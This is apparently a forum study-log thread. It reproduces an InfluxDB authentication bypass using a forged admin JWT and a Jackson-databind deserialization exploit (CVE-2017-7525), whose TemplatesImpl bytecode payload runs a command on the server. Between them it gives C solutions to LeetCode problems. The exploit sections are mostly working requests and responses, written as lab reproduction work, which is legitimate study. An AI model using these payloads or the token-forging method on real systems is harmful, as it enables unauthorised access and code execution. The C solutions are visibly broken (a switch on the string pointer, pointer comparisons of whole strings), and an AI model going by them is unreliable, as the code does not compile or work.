"shard:/var/lib/influxdb/data/_internal/monitor/1:1": {"name":"shard","tags":{"database":"_internal","engine":"tsm1","id":"1","path":"/var/lib/influxdb/data/_internal/monitor/1","retentionPolicy":"monitor","walPath":"/var/lib/influxdb/wal/_internal/monitor/1"},"values":{"diskBytes":42229,"fieldsCreate":111,"seriesCreate":12,"writeBytes":0,"writePointsDropped":0,"writePointsErr":0,"writePointsOk":222,"writeReq":19,"writeReqErr":0,"writeReqOk":19}},
"tsm1_engine:/var/lib/influxdb/data/_internal/monitor/1:1": {"name":"tsm1_engine","tags":{"database":"_internal","engine":"tsm1","id":"1","path":"/var/lib/influxdb/data/_internal/monitor/1","retentionPolicy":"monitor","walPath":"/var/lib/influxdb/wal/_internal/monitor/1"},"values":{"cacheCompactionDuration":0,"cacheCompactionErr":0,"cacheCompactions":0,"cacheCompactionsActive":0,"tsmFullCompactionDuration":0,"tsmFullCompactionErr":0,"tsmFullCompactionQueue":0,"tsmFullCompactions":0,"tsmFullCompactionsActive":0,"tsmLevel1CompactionDuration":0,"tsmLevel1CompactionErr":0,"tsmLevel1CompactionQueue":0,"tsmLevel1Compactions":0,"tsmLevel1CompactionsActive":0,"tsmLevel2CompactionDuration":0,"tsmLevel2CompactionErr":0,"tsmLevel2CompactionQueue":0,"tsmLevel2Compactions":0,"tsmLevel2CompactionsActive":0,"tsmLevel3CompactionDuration":0,"tsmLevel3CompactionErr":0,"tsmLevel3CompactionQueue":0,"tsmLevel3Compactions":0,"tsmLevel3CompactionsActive":0,"tsmOptimizeCompactionDuration":0,"tsmOptimizeCompactionErr":0,"tsmOptimizeCompactionQueue":0,"tsmOptimizeCompactions":0,"tsmOptimizeCompactionsActive":0}},
"tsm1_cache:/var/lib/influxdb/data/_internal/monitor/1:1": {"name":"tsm1_cache","tags":{"database":"_internal","engine":"tsm1","id":"1","path":"/var/lib/influxdb/data/_internal/monitor/1","retentionPolicy":"monitor","walPath":"/var/lib/influxdb/wal/_internal/monitor/1"},"values":{"WALCompactionTimeMs":0,"cacheAgeMs":189002,"cachedBytes":0,"diskBytes":0,"memBytes":47000,"snapshotCount":0,"writeDropped":0,"writeErr":0,"writeOk":19}},
"tsm1_filestore:/var/lib/influxdb/data/_internal/monitor/1:1": {"name":"tsm1_filestore","tags":{"database":"_internal","engine":"tsm1","id":"1","path":"/var/lib/influxdb/data/_internal/monitor/1","retentionPolicy":"monitor","walPath":"/var/lib/influxdb/wal/_internal/monitor/1"},"values":{"diskBytes":0,"numFiles":0}},
"tsm1_wal:/var/lib/influxdb/data/_internal/monitor/1:1": {"name":"tsm1_wal","tags":{"database":"_internal","engine":"tsm1","id":"1","path":"/var/lib/influxdb/data/_internal/monitor/1","retentionPolicy":"monitor","walPath":"/var/lib/influxdb/wal/_internal/monitor/1"},"values":{"currentSegmentDiskBytes":42229,"oldSegmentsDiskBytes":0,"writeErr":0,"writeOk":19}},
"write": {"name":"write","tags":null,"values":{"pointReq":222,"pointReqLocal":222,"req":19,"subWriteDrop":0,"subWriteOk":19,"writeDrop":0,"writeError":0,"writeOk":19,"writeTimeout":0}},
"subscriber": {"name":"subscriber","tags":null,"values":{"createFailures":0,"pointsWritten":0,"writeFailures":0}},
"cq": {"name":"cq","tags":null,"values":{"queryFail":0,"queryOk":0}},
"httpd::8086": {"name":"httpd","tags":{"bind":":8086"},"values":{"authFail":0,"clientError":0,"pingReq":0,"pointsWrittenDropped":0,"pointsWrittenFail":0,"pointsWrittenOK":0,"promReadReq":0,"promWriteReq":0,"queryReq":0,"queryReqDurationNs":0,"queryRespBytes":0,"recoveredPanics":0,"req":5,"reqActive":1,"reqDurationNs":720652,"serverError":0,"statusReq":0,"writeReq":0,"writeReqActive":0,"writeReqBytes":0,"writeReqDurationNs":0}}
}
```

![image-20211107102252898](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211107102252898.png)

用burpsuite抓包后，修改数据包内容如下（执行SQL语句）：

```
POST /query HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc2MzQ2MjY3fQ.NPhb55F0tpsp5X5vcN_IkAAGDfNzV5BA6M4AThhxz6A
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

db=sample&q=show+users

```

![image-20211107102913947](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211107102913947.png)

得到如下信息：

```
HTTP/1.1 200 OK
Content-Type: application/json
Request-Id: 7851a564-3f72-11ec-8001-000000000000
X-Influxdb-Build: OSS
X-Influxdb-Version: 1.6.6
X-Request-Id: 7851a564-3f72-11ec-8001-000000000000
Date: Sun, 07 Nov 2021 02:29:01 GMT
Connection: close
Content-Length: 99

{"results":[{"statement_id":0,"series":[{"columns":["user","admin"],"values":[["admin",true]]}]}]}

```

![image-20211107103002793](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211107103002793.png)

---

ps：

数据包中的

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc2MzQ2MjY3fQ.NPhb55F0tpsp5X5vcN_IkAAGDfNzV5BA6M4AThhxz6A
```

生成方法如下：

我们借助 https://jwt.io/ 来生成 jwt token：

```
{
  "alg": "HS256",
  "typ": "JWT"
}
```

```
{
  "username": "admin",
  "exp": 1676346267
}
```

其中，admin 是一个已经存在的用户，exp 是一个时间戳，代表着这个 token 的过期时间，你需要设置为一个未来的时间戳。

最终生成的 token：

![image-20211107103149539](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211107103149539.png)

# 20211026罗马数字转整数

> 罗马数字包含以下七种字符: I， V， X， L，C，D 和 M。
>
> 字符       数值
> I          1
> V          5
> X          10
> L          50
> C          100
> D          500
> M          1000
>
> 例如，罗马数字 2 写做 II ，即为两个并列的 1。12 写做 XII ，即为 X + II 。 27 写做  XXVII, 即为 XX + V + II 。
>
> 通常情况下，罗马数字中小的数字在大的数字的右边。但也存在特例，例如 4 不写做 IIII，而是 IV。数字 1 在数字 5 的左边，所表示的数等于大数 5 减小数 1 得到的数值 4 。同样地，数字 9 表示为 IX。这个特殊的规则只适用于以下六种情况：
>
>  I 可以放在 V (5) 和 X (10) 的左边，来表示 4 和 9。
>  X 可以放在 L (50) 和 C (100) 的左边，来表示 40 和 90。
>  C 可以放在 D (500) 和 M (1000) 的左边，来表示 400 和 900。
>
> 给定一个罗马数字，将其转换成整数。输入确保在 1 到 3999 的范围内。

```c

int romanToInt(char * s){
int temp = 0;
for (int i = 0; i < strlen(s); i++)
{
      switch (s)
      {
      case 'M':
         temp = temp + 1000;
         break;
      case 'D':
         temp = temp + 500;
         break;
      case 'C':
         if(s[i + 1] == 'M')
         {
            temp  = temp + 900;
            i++;             //跳过下一个数，因为已经用过了。
            break;
         }
         else if(s[i + 1] == 'D')
         {
            temp  = temp + 400;
            i++;
            break;
         }
         else
         {
            temp = temp + 100;
            break;
         }
      case 'L':
         temp = temp + 50;
         break;
      case 'X':
         if(s[i + 1] == 'C')
         {
            temp  = temp + 90;
            i++;
            break;
         }
         else if(s[i + 1] == 'L')
         {
            temp  = temp + 40;
            i++;
            break;
         }
         else
         {
            temp = temp + 10;
            break;
         }
      case 'V':
         temp = temp + 5;
         break;
      case 'I':
         if(s[i + 1] == 'X')
         {
            temp  = temp + 9;
            i++;
            break;
         }
         else if(s[i + 1] == 'V')
         {
            temp  = temp + 4;
            i++;
            break;
         }
         else
         {
            temp = temp + 1;
            break;
         }
      default:
         printf("input is error");
         break;
      }
}/*end switch*/
return temp;
}
```

# 20211107最长公共前缀

编写一个函数来查找字符串数组中的最长公共前缀。

如果不存在公共前缀，返回空字符串 `""`。

```
ps：
如果定义数组s[a],那么数组中的元素s[j]可以用指针*
```

```
char * longestCommonPrefix(char ** strs, int strsSize){
if (strsSize == 0)//输入可能为空，如果答案消耗时间很短的话，很有可能输入的是空字符
{
      return "";
}
char *str = (char*)calloc(128, sizeof(char));//分配128个字节的内存，来存储公共前缀
for (int i = 0,j; i < strlen(*strs); i++)//外循环，以第一个字符串的长度为循环次数，因为最长公共前缀的长度小于等于它
{
      for (j = 0; j < strsSize - 1; j++)//内循环，以字符串个数为循环次数，减1的原因是因为循环内有j+1，不减的话，会发生内存越界
      {
         if(strs[j] != strs[j+1])//如果下一个字符串的i位不等于当前字符串的i位，说明循环结束，i-1位是最长公共前缀的最后一个字符
         {
            return str;
         }
      }
      str = strs[j];//一次内循环结束，说明当前字符这一轮判断通过了，将通过的字符存入str
}
return str;
}
```

sandalwood · 发表于 2021-11-8 22:30:24

今天做了一个复现，然后在写数据结构的作业（作业大概明天能写完，写完再放，先放一个复现）：
# Jackson-databind 反序列化漏洞（CVE-2017-7525）

访问对应的网址是这样的：

```
<html>
<body>
<h1>Whitelabel Error Page</h1>
<p>This application has no explicit mapping for /error, so you are seeing this as a fallback.</p>
<div id='created'>Mon Nov 08 08:25:36 UTC 2021</div>
<div>There was an unexpected error (type=Not Found, status=404).</div>
<div>No message available</div>
</body>
</html>
```

![image-20211108162544267](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211108162544267.png)

打开burpsuite抓包，并将数据包中内容修改为如下内容：

```
POST /exploit HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 1298

{
  "param": [
"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
{
   "transletBytecodes": [
  "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw=="
   ],
   "transletName": "a.b",
   "outputProperties": {}
}
  ]
}

```

![image-20211108164029383](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211108164029383.png)

点击forward后，得到如下信息：

```
["java.util.LinkedHashMap",{"timestamp":["java.util.Date",1636360836626],"status":400,"error":"Bad Request","exception":"org.springframework.http.converter.HttpMessageNotReadableException","message":"JSON parse error: null; nested exception is com.fasterxml.jackson.databind.JsonMappingException: N/A\n at [Source: java.io.PushbackInputStream@4976515e; line: 9, column: 27] (through reference chain: com.b1ngz.sec.model.Target[\"param\"]->com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl[\"outputProperties\"])","path":"/exploit"}]
```

![image-20211108162914466](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211108162914466.png)

进入到bash目录下发现，有一个名为prove1.txt的文件（上面数据包中通过base64加密后的文件）：

```
docker-compose exec web bash

root@10012d3cfbaa:/opt/jdk# ls /tmp
hsperfdata_root  prove1.txt  tomcat-docbase.7120293030886343503.8080  tomcat.6384565990007858766.8080
```

![image-20211108165111029](C:\Users\75986\AppData\Roaming\Typora\typora-user-images\image-20211108165111029.png)

		自动登录	找回密码
密码			立即注册